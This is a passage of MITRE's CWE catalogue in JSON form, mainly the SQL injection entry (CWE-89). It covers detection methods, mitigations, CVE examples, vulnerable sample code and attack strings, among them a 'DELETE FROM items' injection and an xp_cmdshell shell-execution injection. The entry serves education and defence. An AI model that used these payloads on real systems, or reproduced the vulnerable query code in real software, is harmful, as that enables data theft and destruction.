Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Relationships, Other_Notes, Taxonomy_Mappings, Weakness_Ordinalities"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-07-27","Modification_Comment":"updated Other_Notes, Relationship_Notes"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-10-29","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-02-16","Modification_Comment":"updated Potential_Mitigations, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-04-05","Modification_Comment":"updated Related_Attack_Patterns"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-06-21","Modification_Comment":"updated Observed_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2010-09-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-06-01","Modification_Comment":"updated Common_Consequences"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2011-09-13","Modification_Comment":"updated Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-05-11","Modification_Comment":"updated Common_Consequences, Demonstrative_Examples, Observed_Examples, References, Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2012-10-30","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-06-23","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2014-07-30","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2015-12-07","Modification_Comment":"updated Demonstrative_Examples, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2017-11-08","Modification_Comment":"updated Applicable_Platforms, Causal_Nature, Modes_of_Introduction, Relationships, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2018-03-27","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-01-03","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-06-20","Modification_Comment":"updated Related_Attack_Patterns, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-19","Modification_Comment":"updated Description, Name, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2019-09-23","Modification_Comment":"updated Description, Name, Observed_Examples, Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-02-24","Modification_Comment":"updated Potential_Mitigations, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-06-25","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-08-20","Modification_Comment":"updated Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2020-12-10","Modification_Comment":"updated Relationships"}],"Previous_Entry_Name":[{"#text":"Argument Injection or Modification","attr":{"@_Date":"2019-09-19"}},{"#text":"Improper Delimitation of Arguments in a Command (\'Argument Injection\')","attr":{"@_Date":"2019-09-23"}}]}},"89":{"attr":{"@_ID":"89","@_Name":"Improper Neutralization of Special Elements used in an SQL Command (\'SQL Injection\')","@_Abstraction":"Base","@_Structure":"Simple","@_Status":"Stable"},"Description":"The software constructs all or part of an SQL command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended SQL command when it is sent to a downstream component.","Extended_Description":{"xhtml:p":["Without sufficient removal or quoting of SQL syntax in user-controllable inputs, the generated SQL query can cause those inputs to be interpreted as SQL instead of ordinary user data. This can be used to alter query logic to bypass security checks, or to insert additional statements that modify the back-end database, possibly including execution of system commands.","SQL injection has become a common issue with database-driven web sites. The flaw is easily detected, and easily exploited, and as such, any site or software package with even a minimal user base is likely to be subject to an attempted attack of this kind. This flaw depends on the fact that SQL makes no real distinction between the control and data planes."]},"Related_Weaknesses":{"Related_Weakness":[{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"943","@_View_ID":"1000","@_Ordinal":"Primary"}},{"attr":{"@_Nature":"ChildOf","@_CWE_ID":"74","@_View_ID":"1003","@_Ordinal":"Primary"}}]},"Applicable_Platforms":{"Language":{"attr":{"@_Class":"Language-Independent","@_Prevalence":"Undetermined"}},"Technology":{"attr":{"@_Name":"Database Server","@_Prevalence":"Undetermined"}}},"Modes_Of_Introduction":{"Introduction":[{"Phase":"Architecture and Design","Note":"This weakness typically appears in data-rich applications that save user inputs in a database."},{"Phase":"Implementation","Note":"REALIZATION: This weakness is caused during implementation of an architectural security tactic."}]},"Likelihood_Of_Exploit":"High","Common_Consequences":{"Consequence":[{"Scope":"Confidentiality","Impact":"Read Application Data","Note":"Since SQL databases generally hold sensitive data, loss of confidentiality is a frequent problem with SQL injection vulnerabilities."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If poor SQL commands are used to check user names and passwords, it may be possible to connect to a system as another user with no previous knowledge of the password."},{"Scope":"Access Control","Impact":"Bypass Protection Mechanism","Note":"If authorization information is held in a SQL database, it may be possible to change this information through the successful exploitation of a SQL injection vulnerability."},{"Scope":"Integrity","Impact":"Modify Application Data","Note":"Just as it may be possible to read sensitive information, it is also possible to make changes or even delete this information with a SQL injection attack."}]},"Detection_Methods":{"Detection_Method":[{"attr":{"@_Detection_Method_ID":"DM-1"},"Method":"Automated Static Analysis","Description":{"xhtml:p":["This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives.","Automated static analysis might not be able to recognize when proper input validation is being performed, leading to false positives - i.e., warnings that do not have any security consequences or do not require any code changes.","Automated static analysis might not be able to detect the usage of custom API functions or third-party libraries that indirectly invoke SQL commands, leading to false negatives - especially if the API/library code is not available for analysis."]},"Effectiveness_Notes":"This is not a perfect solution, since 100% accuracy and coverage are not feasible."},{"attr":{"@_Detection_Method_ID":"DM-2"},"Method":"Automated Dynamic Analysis","Description":"This weakness can be detected using dynamic tools and techniques that interact with the software using large test suites with many diverse inputs, such as fuzz testing (fuzzing), robustness testing, and fault injection. The software\'s operation may slow down, but it should not become unstable, crash, or generate incorrect results.","Effectiveness":"Moderate"},{"attr":{"@_Detection_Method_ID":"DM-9"},"Method":"Manual Analysis","Description":"Manual analysis can be useful for finding this weakness, but it might not achieve desired code coverage within limited time constraints. This becomes difficult for weaknesses that must be considered for all inputs, since the attack surface can be too large."},{"Method":"Automated Static Analysis - Binary or Bytecode","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Bytecode Weakness Analysis - including disassembler + source code weakness analysis","Binary Weakness Analysis - including disassembler + source code weakness analysis"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Automated Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Database Scanners"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Web Application Scanner","Web Services Scanner"]}}]}},"Effectiveness":"High"},{"Method":"Dynamic Analysis with Manual Results Interpretation","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Fuzz Tester","Framework-based Fuzzer"]}}]}},"Effectiveness":"SOAR Partial"},{"Method":"Manual Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Manual Source Code Review (not inspections)"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Focused Manual Spotcheck - Focused manual analysis of source"}}]}},"Effectiveness":"High"},{"Method":"Automated Static Analysis - Source Code","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":["Source code Weakness Analyzer","Context-configured Source Code Weakness Analyzer"]}}]}},"Effectiveness":"High"},{"Method":"Architecture or Design Review","Description":{"xhtml:p":"According to SOAR, the following detection techniques may be useful:","xhtml:div":{"attr":{"@_style":"margin-left:10px;"},"xhtml:div":["Highly cost effective:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Formal Methods / Correct-By-Construction"}},"Cost effective for partial coverage:",{"attr":{"@_style":"margin-left:10px;"},"xhtml:ul":{"xhtml:li":"Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.)"}}]}},"Effectiveness":"High"}]},"Potential_Mitigations":{"Mitigation":[{"attr":{"@_Mitigation_ID":"MIT-4"},"Phase":"Architecture and Design","Strategy":"Libraries or Frameworks","Description":{"xhtml:p":["Use a vetted library or framework that does not allow this weakness to occur or provides constructs that make this weakness easier to avoid.","For example, consider using persistence layers such as Hibernate or Enterprise Java Beans, which can provide significant protection against SQL injection if used properly."]}},{"attr":{"@_Mitigation_ID":"MIT-27"},"Phase":"Architecture and Design","Strategy":"Parameterization","Description":{"xhtml:p":["If available, use structured mechanisms that automatically enforce the separation between data and code. These mechanisms may be able to provide the relevant quoting, encoding, and validation automatically, instead of relying on the developer to provide this capability at every point where output is generated.","Process SQL queries using prepared statements, parameterized queries, or stored procedures. These features should accept parameters or variables and support strong typing. Do not dynamically construct and execute query strings within these features using \\"exec\\" or similar functionality, since this may re-introduce the possibility of SQL injection. [REF-867]"]}},{"attr":{"@_Mitigation_ID":"MIT-17"},"Phase":["Architecture and Design","Operation"],"Strategy":"Environment Hardening","Description":{"xhtml:p":["Run your code using the lowest privileges that are required to accomplish the necessary tasks [REF-76]. If possible, create isolated accounts with limited privileges that are only used for a single task. That way, a successful attack will not immediately give the attacker access to the rest of the software or its environment. For example, database applications rarely need to run as the database administrator, especially in day-to-day operations.","Specifically, follow the principle of least privilege when creating user accounts to a SQL database. The database users should only have the minimum privileges necessary to use their account. If the requirements of the system indicate that a user can read and modify their own data, then limit their privileges so they cannot read/write others\' data. Use the strictest permissions possible on all database objects, such as execute-only for stored procedures."]}},{"attr":{"@_Mitigation_ID":"MIT-15"},"Phase":"Architecture and Design","Description":"For any security checks that are performed on the client side, ensure that these checks are duplicated on the server side, in order to avoid CWE-602. Attackers can bypass the client-side checks by modifying values after the checks have been performed, or by changing the client to remove the client-side checks entirely. Then, these modified values would be submitted to the server."},{"attr":{"@_Mitigation_ID":"MIT-28"},"Phase":"Implementation","Strategy":"Output Encoding","Description":{"xhtml:p":["While it is risky to use dynamically-generated query strings, code, or commands that mix control and data together, sometimes it may be unavoidable. Properly quote arguments and escape any special characters within those arguments. The most conservative approach is to escape or filter all characters that do not pass an extremely strict allowlist (such as everything that is not alphanumeric or white space). If some special characters are still needed, such as white space, wrap each argument in quotes after the escaping/filtering step. Be careful of argument injection (CWE-88).","Instead of building a new implementation, such features may be available in the database or programming language. For example, the Oracle DBMS_ASSERT package can check or enforce that parameters have certain properties that make them less vulnerable to SQL injection. For MySQL, the mysql_real_escape_string() API function is available in both C and PHP."]}},{"attr":{"@_Mitigation_ID":"MIT-5"},"Phase":"Implementation","Strategy":"Input Validation","Description":{"xhtml:p":["Assume all input is malicious. Use an \\"accept known good\\" input validation strategy, i.e., use a list of acceptable inputs that strictly conform to specifications. Reject any input that does not strictly conform to specifications, or transform it into something that does.","When performing input validation, consider all potentially relevant properties, including length, type of input, the full range of acceptable values, missing or extra inputs, syntax, consistency across related fields, and conformance to business rules. As an example of business rule logic, \\"boat\\" may be syntactically valid because it only contains alphanumeric characters, but it is not valid if the input is only expected to contain colors such as \\"red\\" or \\"blue.\\"","Do not rely exclusively on looking for malicious or malformed inputs.  This is likely to miss at least one undesirable input, especially if the code\'s environment changes. This can give attackers enough room to bypass the intended validation. However, denylists can be useful for detecting potential attacks or determining which inputs are so malformed that they should be rejected outright.","When constructing SQL query strings, use stringent allowlists that limit the character set based on the expected value of the parameter in the request. This will indirectly limit the scope of an attack, but this technique is less important than proper output encoding and escaping.","Note that proper output encoding, escaping, and quoting is the most effective solution for preventing SQL injection, although input validation may provide some defense-in-depth. This is because it effectively limits what will appear in output. Input validation will not always prevent SQL injection, especially if you are required to support free-form text fields that could contain arbitrary characters. For example, the name \\"O\'Reilly\\" would likely pass the validation step, since it is a common last name in the English language. However, it cannot be directly inserted into the database because it contains the \\"\'\\" apostrophe character, which would need to be escaped or otherwise handled. In this case, stripping the apostrophe might reduce the risk of SQL injection, but it would produce incorrect behavior because the wrong name would be recorded.","When feasible, it may be safest to disallow meta-characters entirely, instead of escaping them. This will provide some defense in depth. After the data is entered into the database, later processes may neglect to escape meta-characters before use, and you may not have control over those processes."]}},{"attr":{"@_Mitigation_ID":"MIT-21"},"Phase":"Architecture and Design","Strategy":"Enforcement by Conversion","Description":"When the set of acceptable objects, such as filenames or URLs, is limited or known, create a mapping from a set of fixed input values (such as numeric IDs) to the actual filenames or URLs, and reject all other inputs."},{"attr":{"@_Mitigation_ID":"MIT-39"},"Phase":"Implementation","Description":{"xhtml:p":["Ensure that error messages only contain minimal details that are useful to the intended audience and no one else. The messages need to strike the balance between being too cryptic (which can confuse users) or being too detailed (which may reveal more than intended). The messages should not reveal the methods that were used to determine the error. Attackers can use detailed information to refine or optimize their original attack, thereby increasing their chances of success.","If errors must be captured in some detail, record them in log messages, but consider what could occur if the log messages can be viewed by attackers. Highly sensitive information such as passwords should never be saved to log files.","Avoid inconsistent messaging that might accidentally tip off an attacker about internal state, such as whether a user account exists or not.","In the context of SQL Injection, error messages revealing the structure of a SQL query can help attackers tailor successful attack strings."]}},{"attr":{"@_Mitigation_ID":"MIT-29"},"Phase":"Operation","Strategy":"Firewall","Description":"Use an application firewall that can detect attacks against this weakness. It can be beneficial in cases in which the code cannot be fixed (because it is controlled by a third party), as an emergency prevention measure while more comprehensive software assurance measures are applied, or to provide defense in depth.","Effectiveness":"Moderate","Effectiveness_Notes":"An application firewall might not cover all possible input vectors. In addition, attack techniques might be available to bypass the protection mechanism, such as using malformed inputs that can still be processed by the component that receives those inputs. Depending on functionality, an application firewall might inadvertently reject or modify legitimate requests. Finally, some manual effort may be required for customization."},{"attr":{"@_Mitigation_ID":"MIT-16"},"Phase":["Operation","Implementation"],"Strategy":"Environment Hardening","Description":"When using PHP, configure the application so that it does not use register_globals. During implementation, develop the application so that it does not rely on this feature, but be wary of implementing a register_globals emulation that is subject to weaknesses such as CWE-95, CWE-621, and similar issues."}]},"Demonstrative_Examples":{"Demonstrative_Example":[{"Intro_Text":"In 2008, a large number of web servers were compromised using the same SQL injection attack string. This single string worked against many different programs. The SQL injection was then used to modify the web sites to serve malicious code."},{"Intro_Text":"The following code dynamically constructs and executes a SQL query that searches for items matching a specified name. The query restricts the items displayed to those where owner matches the user name of the currently-authenticated user.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"C#"},"xhtml:div":{"#text":"...string userName = ctx.getAuthenticatedUserName();string query = \\"SELECT * FROM items WHERE owner = \'\\" + userName + \\"\' AND itemname = \'\\" + ItemName.Text + \\"\'\\";sda = new SqlDataAdapter(query, conn);DataTable dt = new DataTable();sda.Fill(dt);...","xhtml:br":["","","","","",""]}},{"attr":{"@_Nature":"informative"},"xhtml:div":"SELECT * FROM items WHERE owner = &lt;userName&gt; AND itemname = &lt;itemName&gt;;"},{"attr":{"@_Nature":"attack"},"xhtml:div":"name\' OR \'a\'=\'a"},{"attr":{"@_Nature":"attack"},"xhtml:div":"SELECT * FROM items WHERE owner = \'wiley\' AND itemname = \'name\' OR \'a\'=\'a\';"},{"attr":{"@_Nature":"attack"},"xhtml:div":"OR \'a\'=\'a"},{"attr":{"@_Nature":"attack"},"xhtml:div":"SELECT * FROM items;"}],"Body_Text":["The query that this code intends to execute follows:","However, because the query is constructed dynamically by concatenating a constant base query string and a user input string, the query only behaves correctly if itemName does not contain a single-quote character. If an attacker with the user name wiley enters the string:","for itemName, then the query becomes the following:","The addition of the:","condition causes the WHERE clause to always evaluate to true, so the query becomes logically equivalent to the much simpler query:","This simplification of the query allows the attacker to bypass the requirement that the query only return items owned by the authenticated user; the query now returns all entries stored in the items table, regardless of their specified owner."]},{"Intro_Text":"This example examines the effects of a different malicious value passed to the query constructed and executed in the previous example.","Body_Text":["If an attacker with the user name wiley enters the string:","for itemName, then the query becomes the following two queries:","Many database servers, including Microsoft(R) SQL Server 2000, allow multiple SQL statements separated by semicolons to be executed at once. While this attack string results in an error on Oracle and other database servers that do not allow the batch-execution of statements separated by semicolons, on databases that do allow batch execution, this type of attack allows the attacker to execute arbitrary commands against the database.","Notice the trailing pair of hyphens (--), which specifies to most database servers that the remainder of the statement is to be treated as a comment and not executed. In this case the comment character serves to remove the trailing single-quote left over from the modified query. On a database where comments are not allowed to be used in this way, the general attack could still be made effective using a trick similar to the one shown in the previous example.","If an attacker enters the string","Then the following three valid statements will be created:","One traditional approach to preventing SQL injection attacks is to handle them as an input validation problem and either accept only characters from an allowlist of safe values or identify and escape a denylist of potentially malicious values. Allowlists can be a very effective means of enforcing strict input validation rules, but parameterized SQL statements require less maintenance and can offer more guarantees with respect to security. As is almost always the case, denylisting is riddled with loopholes that make it ineffective at preventing SQL injection attacks. For example, attackers can:",{"xhtml:ul":{"xhtml:li":[{"xhtml:div":"Target fields that are not quoted"},{"xhtml:div":"Find ways to bypass the need for certain escaped meta-characters"},{"xhtml:div":"Use stored procedures to hide the injected meta-characters."}]}},"Manually escaping characters in input to SQL queries can help, but it will not make your application secure from SQL injection attacks.","Another solution commonly proposed for dealing with SQL injection attacks is to use stored procedures. Although stored procedures prevent some types of SQL injection attacks, they do not protect against many others. For example, the following PL/SQL procedure is vulnerable to the same SQL injection attack shown in the first example.","Stored procedures typically help prevent SQL injection attacks by limiting the types of statements that can be passed to their parameters. However, there are many ways around the limitations and many interesting statements that can still be passed to stored procedures. Again, stored procedures can prevent some exploits, but they will not make your application secure against SQL injection attacks."],"Example_Code":[{"attr":{"@_Nature":"attack"},"xhtml:div":"name\'; DELETE FROM items; --"},{"attr":{"@_Nature":"attack","@_Language":"SQL"},"xhtml:div":{"#text":"SELECT * FROM items WHERE owner = \'wiley\' AND itemname = \'name\';DELETE FROM items;","xhtml:br":["","",""],"xhtml:i":"--\'"}},{"attr":{"@_Nature":"attack"},"xhtml:div":"name\'; DELETE FROM items; SELECT * FROM items WHERE \'a\'=\'a"},{"attr":{"@_Nature":"attack"},"xhtml:div":{"#text":"SELECT * FROM items WHERE owner = \'wiley\' AND itemname = \'name\';DELETE FROM items;SELECT * FROM items WHERE \'a\'=\'a\';","xhtml:br":["",""]}},{"attr":{"@_Nature":"bad"},"xhtml:div":{"#text":"procedure get_item ( itm_cv IN OUT ItmCurTyp, usr in varchar2, itm in varchar2)is open itm_cv for\' SELECT * FROM items WHERE \' || \'owner = \'|| usr || \' AND itemname = \' || itm || \';end get_item;","xhtml:br":["","",""]}}]},{"Intro_Text":"MS SQL has a built in function that enables shell command execution. An SQL injection in such a context could be disastrous. For example, a query of the form:","Example_Code":[{"attr":{"@_Nature":"bad"},"xhtml:div":"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=\'$user_input\' ORDER BY PRICE"},{"attr":{"@_Nature":"attack"},"xhtml:div":"\'; exec master..xp_cmdshell \'dir\' --"},{"attr":{"@_Nature":"attack"},"xhtml:div":"SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=\'\'; exec master..xp_cmdshell \'dir\' --\' ORDER BY PRICE"}],"Body_Text":["Where $user_input is taken from an untrusted source.","If the user provides the string:","The query will take the following form:","Now, this query can be broken down into:",{"xhtml:ol":{"xhtml:li":[{"xhtml:div":"a first SQL query: SELECT ITEM,PRICE FROM PRODUCT WHERE ITEM_CATEGORY=\'\';"},{"xhtml:div":"a second SQL query, which executes the dir command in the shell: exec master..xp_cmdshell \'dir\'"},{"xhtml:div":"an MS SQL comment: --\' ORDER BY PRICE"}]}},"As can be seen, the malicious input changes the semantics of the query into a query, a shell command execution and a comment."]},{"Intro_Text":"This code intends to print a message summary given the message ID.","Example_Code":[{"attr":{"@_Nature":"bad","@_Language":"PHP"},"xhtml:div":{"#text":"$id = $_COOKIE[\\"mid\\"];mysql_query(\\"SELECT MessageID, Subject FROM messages WHERE MessageID = \'$id\'\\");","xhtml:br":""}},{"attr":{"@_Nature":"attack"},"xhtml:div":"1432\' or \'1\' = \'1"},{"attr":{"@_Nature":"result"},"xhtml:div":"SELECT MessageID, Subject FROM messages WHERE MessageID = \'1432\' or \'1\' = \'1\'"},{"attr":{"@_Nature":"good","@_Language":"PHP"},"xhtml:div":{"#text":"$id = intval($_COOKIE[\\"mid\\"]);mysql_query(\\"SELECT MessageID, Subject FROM messages WHERE MessageID = \'$id\'\\");","xhtml:br":""}}],"Body_Text":["The programmer may have skipped any input validation on $id under the assumption that attackers cannot modify the cookie. However, this is easy to do with custom client code or even in the web browser.","While $id is wrapped in single quotes in the call to mysql_query(), an attacker could simply change the incoming mid cookie to:","This would produce the resulting query:","Not only will this retrieve message number 1432, it will retrieve all other messages.","In this case, the programmer could apply a simple modification to the code to eliminate the SQL injection:","However, if this code is intended to support multiple users with different message boxes, the code might also need an access control check (CWE-285) to ensure that the application user has the permission to see that message."]},{"Intro_Text":"This example attempts to take a last name provided by a user and enter it into a database.","Example_Code":{"attr":{"@_Nature":"bad","@_Language":"Perl"},"xhtml:div":{"#text":"$userKey = getUserID();$name = getUserInput();$name = allowList($name, \\"^a-zA-z\'-$\\");$query = \\"INSERT INTO last_names VALUES(\'$userKey\', \'$name\')\\";","xhtml:br":["","","","",""],"xhtml:i":"# ensure only letters, hyphens and apostrophe are allowed"}},"Body_Text":"While the programmer applies a allowlist to the user input, it has shortcomings. First of all, the user is still allowed to provide hyphens, which are used as comment structures in SQL. If a user specifies \\"--\\" then the remainder of the statement will be treated as a comment, which may bypass security logic. Furthermore, the allowlist permits the apostrophe, which is also a data / command separator in SQL. If a user supplies a name with an apostrophe, they may be able to alter the structure of the whole statement and even change control flow of the program, possibly accessing or modifying confidential information. In this situation, both the hyphen and apostrophe are legitimate characters for a last name and permitting them is required. Instead, a programmer may want to use a prepared statement or apply an encoding routine to the input to prevent any data / directive misinterpretations."}]},"Observed_Examples":{"Observed_Example":[{"Reference":"CVE-2004-0366","Description":"chain: SQL injection in library intended for database authentication allows SQL injection and authentication bypass.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-0366"},{"Reference":"CVE-2008-2790","Description":"SQL injection through an ID that was supposed to be numeric.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2790"},{"Reference":"CVE-2008-2223","Description":"SQL injection through an ID that was supposed to be numeric.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2223"},{"Reference":"CVE-2007-6602","Description":"SQL injection via user name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6602"},{"Reference":"CVE-2008-5817","Description":"SQL injection via user name or password fields.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-5817"},{"Reference":"CVE-2003-0377","Description":"SQL injection in security product, using a crafted group name.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0377"},{"Reference":"CVE-2008-2380","Description":"SQL injection in authentication library.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-2380"},{"Reference":"CVE-2017-11508","Description":"SQL injection in vulnerability management and reporting tool, using a crafted password.","Link":"https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-11508"}]},"Taxonomy_Mappings":{"Taxonomy_Mapping":[{"attr":{"@_Taxonomy_Name":"PLOVER"},"Entry_Name":"SQL injection"},{"attr":{"@_Taxonomy_Name":"7 Pernicious Kingdoms"},"Entry_Name":"SQL Injection"},{"attr":{"@_Taxonomy_Name":"CLASP"},"Entry_Name":"SQL injection"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2007"},"Entry_ID":"A2","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A1","Entry_Name":"Unvalidated Input","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"OWASP Top Ten 2004"},"Entry_ID":"A6","Entry_Name":"Injection Flaws","Mapping_Fit":"CWE More Specific"},{"attr":{"@_Taxonomy_Name":"WASC"},"Entry_ID":19,"Entry_Name":"SQL Injection"},{"attr":{"@_Taxonomy_Name":"Software Fault Patterns"},"Entry_ID":"SFP24","Entry_Name":"Tainted input to command"},{"attr":{"@_Taxonomy_Name":"OMG ASCSM"},"Entry_ID":"ASCSM-CWE-89"},{"attr":{"@_Taxonomy_Name":"SEI CERT Oracle Coding Standard for Java"},"Entry_ID":"IDS00-J","Entry_Name":"Prevent SQL injection","Mapping_Fit":"Exact"}]},"Related_Attack_Patterns":{"Related_Attack_Pattern":[{"attr":{"@_CAPEC_ID":"108"}},{"attr":{"@_CAPEC_ID":"109"}},{"attr":{"@_CAPEC_ID":"110"}},{"attr":{"@_CAPEC_ID":"470"}},{"attr":{"@_CAPEC_ID":"66"}},{"attr":{"@_CAPEC_ID":"7"}}]},"References":{"Reference":[{"attr":{"@_External_Reference_ID":"REF-44","@_Section":"&#34;Sin 1: SQL Injection.&#34; Page 3"}},{"attr":{"@_External_Reference_ID":"REF-7","@_Section":"Chapter 12, &#34;Database Input Issues&#34; Page 397"}},{"attr":{"@_External_Reference_ID":"REF-867"}},{"attr":{"@_External_Reference_ID":"REF-868"}},{"attr":{"@_External_Reference_ID":"REF-869"}},{"attr":{"@_External_Reference_ID":"REF-870"}},{"attr":{"@_External_Reference_ID":"REF-871"}},{"attr":{"@_External_Reference_ID":"REF-872"}},{"attr":{"@_External_Reference_ID":"REF-873"}},{"attr":{"@_External_Reference_ID":"REF-874"}},{"attr":{"@_External_Reference_ID":"REF-875"}},{"attr":{"@_External_Reference_ID":"REF-76"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 8, &#34;SQL Queries&#34;, Page 431"}},{"attr":{"@_External_Reference_ID":"REF-62","@_Section":"Chapter 17, &#34;SQL Injection&#34;, Page 1061"}},{"attr":{"@_External_Reference_ID":"REF-962","@_Section":"ASCSM-CWE-89"}}]},"Notes":{"Note":{"#text":"SQL injection can be resultant from special character mismanagement, MAID, or denylist/allowlist problems. It can be primary to authentication errors.","attr":{"@_Type":"Relationship"}}},"Content_History":{"Submission":{"Submission_Name":"PLOVER","Submission_Date":"2006-07-19"},"Modification":[{"Modification_Name":"Eric Dalci","Modification_Organization":"Cigital","Modification_Date":"2008-07-01","Modification_Comment":"updated Time_of_Introduction"},{"Modification_Organization":"KDM Analytics","Modification_Date":"2008-08-01","Modification_Comment":"added/updated white box definitions"},{"Modification_Organization":"Veracode","Modification_Date":"2008-08-15","Modification_Comment":"Suggested OWASP Top Ten 2004 mapping"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-09-08","Modification_Comment":"updated Applicable_Platforms, Common_Consequences, Modes_of_Introduction, Name, Relationships, Other_Notes, Relationship_Notes, Taxonomy_Mappings"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-10-14","Modification_Comment":"updated Description"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2008-11-24","Modification_Comment":"updated Observed_Examples"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-01-12","Modification_Comment":"updated Demonstrative_Examples, Description, Enabling_Factors_for_Exploitation, Modes_of_Introduction, Name, Observed_Examples, Other_Notes, Potential_Mitigations, References, Relationships"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-03-10","Modification_Comment":"updated Potential_Mitigations"},{"Modification_Name":"CWE Content Team","Modification_Organization":"MITRE","Modification_Date":"2009-05-27","Modification_Comment":"updated Demonstrative_Examples, Name, Related_Attack_Patterns"},{"Modification_Name":"KDM Analytics","Modification_Date":"2009-07-17","Modification_Comment":"Improved the White_Box_Definition"},{"Modification_Name":"CWE Content 